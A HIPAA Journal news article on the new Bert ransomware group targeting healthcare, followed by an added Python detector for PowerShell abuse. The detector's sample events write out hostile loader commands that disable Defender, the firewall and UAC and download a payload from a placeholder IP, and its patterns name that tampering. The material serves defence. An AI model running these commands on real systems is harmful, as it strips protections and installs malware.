
The HIPAA Journal is the leading provider of HIPAA training, news, regulatory updates, and independent compliance advice.

Trend Micro Warns of New Ransomware Group Targeting Healthcare Orgs

A new ransomware group has recently emerged that is targeting multiple sectors, especially healthcare, technology, and event services. According to a recent report from cybersecurity firm Trend Micro, the Bert ransomware group’s first attacks were observed in the United States and Asia, although internal telemetry has identified further victims across Europe. While only limited evidence has been found, the new group, tracked by Trend Micro as Water Pombero, is thought to be Russian, or at least have links to the region, as the group downloads and executes its ransomware from a remote IP address associated with ASN 39134, which is registered in Russia.

The Bert Windows variant uses a straightforward code structure and a standard AES algorithm for encryption; however, the group is actively developing and refining the ransomware and improving and streamlining operations. For instance, the early iterations enumerated drives, dropped a ransom note in each directory, and collected valid file paths and saved them in an array, only proceeding with multi-threaded encryption after the collection phase. The latest iteration uses ConcurrentQueue and creates a DiskWorker on each drive, allowing file encryption to start as soon as files are discovered, speeding up file encryption.

It is currently unclear how initial access to a victim’s systems is gained. Once inside the victim’s network, the group uses a PowerShell script to escalate privileges and disable Windows Defender, the firewall, and user account control (UAC). The script then downloads the ransomware payload from a remote IP address and executes it. PowerShell is extensively used by ransomware groups for post-compromise activities, as it makes it easy to evade detection. Trend Micro has also identified a Linux sample, which uses 50 threads to maximize encryption speed, reducing the risk of detection or interruption. Some code overlaps have been identified with the ESXi locker used by the REvil ransomware group, which ceased operations in 2021.

“New ransomware groups will likely continue to emerge, repurposing familiar tools and code, while refining TTPs,” explained Trend Micro. “As the BERT ransomware group demonstrates, simple tools can lead to successful infections. This highlights how emerging groups do not need complex techniques to be effective—just a reliable path to their goal, from intrusion, exfiltration and ultimately leverage over victim.”


Since the initial access vector has yet to be identified, the best defense is to use proven security best practices, user education about email and web safety, sandboxing to analyze files before execution, prompt patching, strengthening endpoint protection, restricting admin rights, segmenting networks, and regularly backing up data and storing backups offline. Trend Micro also recommends closely monitoring for PowerShell abuse and unauthorized script execution, especially for loaders such as start.ps1 that disable security tools and escalate privileges. Full TTPs and other recommendations are detailed in the Bert ransomware report.
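
One way to implement the PowerShell monitoring recommended above, as an added example that is not from the article or the Trend Micro report: it scans PowerShell script block logging text (Event ID 4104) for the loader behaviours described earlier and rates each script block by how many of them it combines. The command patterns, host names, file paths and sample events are assumptions constructed for illustration.

```python
import re

# Assumption: common, publicly documented command forms for the actions the
# article lists; these are not indicators taken from the Trend Micro report.
BEHAVIOURS = {
    "defender_off": re.compile(r"Set-MpPreference\b.*-Disable\w+\s+(\$true|1)\b", re.I),
    "firewall_off": re.compile(
        r"Set-NetFirewallProfile\b.*-Enabled\s+(False|0)\b"
        r"|advfirewall\s+set\s+\w+\s+state\s+off\b", re.I),
    "uac_off": re.compile(r"EnableLUA\b.*?\b0\b", re.I),
    "remote_ip_download": re.compile(
        r"\b(Invoke-WebRequest|iwr|DownloadFile|DownloadString|Start-BitsTransfer)\b"
        r".*https?://\d{1,3}(?:\.\d{1,3}){3}", re.I),
}

def classify(script_block_text):
    """Return (severity, behaviours) for one Event ID 4104 ScriptBlockText."""
    hits = set()
    for line in script_block_text.splitlines():
        line = line.replace("`", "")  # drop backtick escapes that split keywords
        hits.update(n for n, p in BEHAVIOURS.items() if p.search(line))
    tamper = hits - {"remote_ip_download"}
    if tamper and "remote_ip_download" in hits:
        return "high", sorted(hits)    # protections disabled and payload fetched
    if tamper:
        return "medium", sorted(hits)  # tampering without a raw-IP download
    return ("low" if hits else None), sorted(hits)

def triage(events):
    """Return (host, path, severity, behaviours) for every flagged script block."""
    rows = [(e["host"], e["path"]) + classify(e["text"]) for e in events]
    return [r for r in rows if r[2] is not None]

# Constructed sample events (not real telemetry); 192.0.2.10 is a documentation address.
EVENTS = [
    {"host": "ws-01", "path": r"C:\Users\Public\start.ps1", "text": "\n".join([
        r"Set-MpPreference -DisableRealtimeMonitoring $true",
        r"netsh advfirewall set allprofiles state off",
        r"Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name EnableLUA -Value 0",
        r"Invoke-WebRequest -Uri http://192.0.2.10/payload.exe -OutFile $env:TEMP\payload.exe",
    ])},
    {"host": "ws-02", "path": r"C:\Ops\update-agent.ps1",
     "text": "Invoke-WebRequest -Uri https://updates.example.com/agent.msi -OutFile agent.msi"},
    {"host": "ws-03", "path": r"C:\Temp\a.ps1",
     "text": "Set-MpPrefer`ence -DisableRealtimeMonitoring $true"},
]

if __name__ == "__main__":
    for row in triage(EVENTS):
        print(row)
```

Script block logging must be enabled for Event ID 4104 records to exist, and string matching of this kind is a triage aid that obfuscation beyond backtick escapes can defeat.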

Author: Steve Alder is the editor-in-chief of The HIPAA Journal. Steve is responsible for editorial policy regarding the topics covered in The HIPAA Journal. He is a specialist on healthcare industry legal and regulatory affairs, and has 10 years of experience writing about HIPAA and other related legal topics. Steve has developed a deep understanding of regulatory issues surrounding the use of information technology in the healthcare industry and has written hundreds of articles on HIPAA-related topics. Steve shapes the editorial policy of The HIPAA Journal, ensuring its comprehensive coverage of critical topics. Steve Alder is considered an authority in the healthcare industry on HIPAA. The HIPAA Journal has evolved into the leading independent authority on HIPAA under Steve’s editorial leadership. Steve manages a team of writers and is responsible for the factual and legal accuracy of all content published on The HIPAA Journal. Steve holds a Bachelor’s of Science degree from the University of Liverpool. You can connect with Steve via LinkedIn or email via stevealder(at)hipaajournal.com
